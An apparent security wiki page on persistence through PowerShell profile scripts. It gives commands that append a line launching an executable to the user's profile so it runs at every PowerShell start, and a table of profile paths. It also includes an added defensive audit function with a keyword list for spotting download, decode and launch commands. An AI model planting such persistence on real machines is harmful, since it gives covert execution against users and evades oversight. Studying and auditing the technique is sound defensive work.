# Abusing PowerShell Profiles

PowerShell executes the contents of its profile scripts at startup.

PowerShell:

```
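# Show the path of the current user's profile for this host
echo $profile
# Check whether that profile file already exists
Test-Path $profile
# Create the profile file (-Force overwrites an existing one)
New-Item -Path $profile -Type File -Force
# Append a command to the profile; it runs every time PowerShell starts
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath $profile -Append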
```

Note: PowerShell has several default profile files. In the table below, precedence runs from highest at the top to lowest at the bottom.

| Description                | Path                                                              |
| -------------------------- | ----------------------------------------------------------------- |
| All Users, All Hosts       | $PSHOME\Profile.ps1                                               |
| All Users, Current Host    | $PSHOME\Microsoft.PowerShell\_profile.ps1                         |
| Current User, All Hosts    | $Home\[My ]Documents\PowerShell\Profile.ps1                       |
| Current User, Current Host | $Home\[My ]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 |
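
An added defensive example (not from the original page or the referenced projects): a PowerShell audit of the four profile locations in the table above, reporting existence, last-write time, SHA-256, signature status and any lines that match a keyword list. The function name `Get-ProfileAudit` and the keyword list are assumptions made for illustration.

```powershell
# Added example (defensive audit), not code from the original page.
# Assumption: the keyword list is illustrative; tune it for your environment.
$SuspiciousPattern = 'Start-Process|Invoke-Expression|\bIEX\b|DownloadString|' +
                     'Invoke-WebRequest|FromBase64String|EncodedCommand'

function Get-ProfileAudit {
    param(
        # Defaults to the four profile paths of the host this runs in.
        [string[]]$Path = @(
            $PROFILE.AllUsersAllHosts,
            $PROFILE.AllUsersCurrentHost,
            $PROFILE.CurrentUserAllHosts,
            $PROFILE.CurrentUserCurrentHost
        )
    )
    foreach ($p in ($Path | Where-Object { $_ })) {
        $exists = Test-Path -LiteralPath $p -PathType Leaf
        $hits = @()
        if ($exists) {
            # Lines that launch processes, download, or decode content
            $hits = @(Select-String -LiteralPath $p -Pattern $SuspiciousPattern |
                ForEach-Object { '{0}: {1}' -f $_.LineNumber, $_.Line.Trim() })
        }
        # Same property set for every path so the report stays uniform
        [pscustomobject]@{
            Path          = $p
            Exists        = $exists
            LastWriteTime = if ($exists) { (Get-Item -LiteralPath $p -Force).LastWriteTime }
            SHA256        = if ($exists) { (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash }
            Signature     = if ($exists) { (Get-AuthenticodeSignature -LiteralPath $p).Status }
            Suspicious    = $hits
        }
    }
}

# Report every profile; existing files with hits deserve a manual review.
Get-ProfileAudit | Format-List
```

Run it in each installed PowerShell edition and host, because `$PROFILE` resolves to different paths in each (for example `WindowsPowerShell` versus `PowerShell` under Documents). Sessions started with `-NoProfile` skip these files entirely.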

References:

{% embed url="<https://github.com/enigma0x3/PowershellProfile>" %}

{% embed url="<https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/>" %}

{% embed url="<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6>" %}
